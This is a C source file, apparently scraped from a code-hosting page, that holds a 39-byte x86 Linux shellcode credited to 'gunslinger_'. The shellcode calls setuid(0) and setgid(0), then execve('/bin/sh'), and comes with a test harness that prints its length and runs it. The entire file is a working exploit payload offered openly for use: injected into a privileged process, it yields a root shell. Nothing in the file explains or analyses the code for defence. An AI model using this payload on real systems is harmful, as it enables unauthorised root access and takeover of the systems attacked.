38 lines
No EOL
1.4 KiB
C
38 lines
No EOL
1.4 KiB
C
/*
|
|
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
|
|
Date : Tue Jun 1 21:29:10 2010
|
|
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
|
|
Web : http://devilzc0de.org
|
|
blog : http://gunslingerc0de.wordpress.com
|
|
tested on : linux debian
|
|
*/
|
|
#include <stdio.h>
|
|
|
|
char *shellcode=
|
|
"\xeb\x19" /* jmp 0x804807b */
|
|
"\x31\xc0" /* xor %eax,%eax */
|
|
"\xb0\x17" /* mov $0x17,%al */
|
|
"\x31\xdb" /* xor %ebx,%ebx */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x31\xc0" /* xor %eax,%eax */
|
|
"\xb0\x2e" /* mov $0x2e,%al */
|
|
"\x31\xdb" /* xor %ebx,%ebx */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x31\xc0" /* xor %eax,%eax */
|
|
"\xb0\x0b" /* mov $0xb,%al */
|
|
"\x5b" /* pop %ebx */
|
|
"\x89\xd1" /* mov %edx,%ecx */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\xe8\xe2\xff\xff\xff" /* call 0x8048062 */
|
|
"\x2f" /* das */
|
|
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
|
|
"\x2f" /* das */
|
|
"\x73\x68" /* jae 0x80480ef */
|
|
"";
|
|
|
|
int main(void)
|
|
{
|
|
fprintf(stdout,"Length: %d\n",strlen(shellcode));
|
|
((void (*)(void)) shellcode)();
|
|
return 0;
|
|
} |